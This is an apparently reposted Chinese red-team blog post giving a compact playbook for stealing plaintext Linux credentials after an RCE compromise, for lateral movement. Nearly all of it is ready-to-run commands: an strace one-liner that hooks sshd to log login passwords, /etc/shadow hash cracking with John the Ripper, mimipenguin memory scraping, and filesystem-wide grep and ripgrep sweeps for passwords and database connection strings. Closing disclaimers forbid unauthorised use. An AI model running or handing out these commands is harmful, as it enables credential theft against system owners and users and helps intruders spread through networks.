写在前面
去年一次红队复盘,一个师傅用strace钓到了Linux机器的账密,简单汇总实践一下Linux明文账密获取。
目录
0x01 sshd进程监听
0x02 history
0x03 shadow
0x04 内存中明文密码抓取
0x05 全局搜索
0x06 参考
sshd进程监听
适用场景:利用RCE漏洞获取linux机器权限,并没有该机器ssh密码,获取明文密码后可用于内网横向。
利用strace监听所有sshd进程
strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> sshd.log &
当有新的连接,会产生明文记录,read(6, "f 10后面为密码
history
history,不小心输入到命令行的密码
shadow
$6$lEzUomMQ19rhmRGi$8KLH4irfWaZ
$id为1时,采用MD5进行加密
$id为5时,采用SHA256进行加密
$id为6时,采用SHA512进行加密
wget https://www.openwall.com/john/k/john-1.9.0.tar.gz
tar -zxvf john-1.9.0.tar.gz
make clean linux-x86-64
//在run目录下
/etc/shadow
内存中明文密码抓取
./mimipenguin.sh
全局搜索
grep -rn "password=" /
快速全局搜索
apt install ripgrep
rg -i -e "pass" -e "pwd" -e "passwd" -e "密码" -g "*.{ini,xml,config,properties,sh,yum,cnf,class,dat}" / >pwd.txt
//数据库连接信息
rg -i -e "1521" -e "1433" -g "*.{ini,xml,config,properties,sh,yum}" / >db.txt
参考
https://www.linuxprobe.com/linux-commands-tools.html
写在最后
本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好地维护个人信息安全、企业安全、国家安全。
未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
原文始发于微信公众号(云下信安):Linux明文密码获取
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论